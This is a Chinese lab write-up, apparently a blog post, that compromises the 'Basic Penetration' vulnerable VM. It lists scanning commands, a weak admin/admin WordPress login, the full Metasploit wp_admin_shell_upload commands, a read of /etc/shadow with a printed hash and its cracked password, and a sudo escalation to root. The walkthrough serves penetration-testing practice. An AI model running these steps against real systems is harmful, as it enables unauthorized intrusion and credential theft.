Basic penetration靶机

主机发现

arp-scan -l

端口扫描

nmap -sV -sT -O 192.168.224.138 -p-

目录扫描

dirsearch -u http://192.168.224.138

浏览器访问

往下翻到一个login界面,尝试弱口令 admin admin 登录一下

getshell

利用msf的模块来getshell,启动msf,成功 getshell

msfconsole   #开启msf环境
 
search wp_admin 				#搜索wordpress的admin账户的上传利用脚本
use exploit/unix/webapp/wp_admin_shell_upload			#进入利用脚本
show option
set rhosts 192.168.224.138
set targeturi /secret/	#设置目标的url目录地址
set username admin   #设置登录的用户账号
set password admin   #设置登陆的用户密码
run   # 运行

提权

先转变为交互式的shell

shell
 
python -c 'import pty; pty.spawn("/bin/bash")'

利用sudo 提权发现需要密码,但是发现 /etc/shadow 是可以读的

cat /etc/shadow

发现一个 用户 和加密后的密码

marlinspike:$6$wQb5nV3T$xB2WO/jOkbn4t1RUILrckw69LR/0EMtUbFFCYpM3MUHVmtyYW9.ov/aszTpWhLaC2x6Fvy5tpUUxQbUhCKbl4
#解密过后
marlinspike:marlinspike

此时可以切换到这个用户,再sudu su 到root用户

su marlinspike
marlinspike
sudo su
marlinspike
whoami

提权成功!

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值